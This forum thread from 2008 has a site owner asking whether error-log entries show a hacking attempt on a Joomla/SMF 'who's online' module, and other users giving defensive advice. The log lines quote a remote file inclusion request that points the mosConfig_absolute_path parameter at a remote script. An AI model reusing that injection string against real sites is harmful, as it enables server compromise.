Hacking attempt?

hefesto · April 15, 2008, 02:37:51 PM

I've found this in my error log:

Quote
http://www.mysite.com/index.php?option=com_smf&Itemid=91&option=com_smf&Itemid=1&mosConfig_absolute_path=http://www.whitsundaychamber.com/id.txt??

8: Undefined variable: mosConfig_db
File: .../modules/mod_smf_online2.php
Line: 281

http://www.mysite.com/index.php?option=com_smf&Itemid=91&option=com_smf&Itemid=1&mosConfig_absolute_path=http://www.whitsundaychamber.com/id.txt??

8: Undefined variable: moduleclass_sfx
File: .../modules/mod_smf_online2.php
Line: 279

I think it's a code injection attempt using smf-joomla who's online module, am I right? Is there any risk using this module?

I'm using Joomla 1.0.12 with SMF 1.1.4 and bridge 1.1.7

Kindred · April 15, 2008, 06:31:30 PM

you are correct... he is TRYING to hack.

What version of smf_online2 do you have?

hefesto · April 15, 2008, 06:38:18 PM

These are the first lines of my module:

Code Select

// $Id: mod_smf_online2.php,v 1.8 2006.04.10 Kindred
/**
* @Who is online
* @package smf
* @Copyright (C) 2005 [email protected]
* @ All rights reserved
* @ Released under GNU/GPL License : http://www.gnu.org/copyleft/gpl.html
* @version $Revision: 1.8 $
*/

Thanks for the quick reply

.

Kindred · April 16, 2008, 09:21:14 AM

you should be fine then...

that version is not affected by the vairant hack that the person attempted.

steighan · April 17, 2008, 01:06:15 AM

make sure that you have REGISTER GLOBALS turned off, BOTH at the PHP level, AND in Joomla, which may turn it on internally otherwise it will work.

Also: you can put a line in your .HTACCESS file to redirect any request that has "http" or attempts to set mosConfig in a url..

News:

Hacking attempt?

hefesto

Kindred

hefesto

Kindred

steighan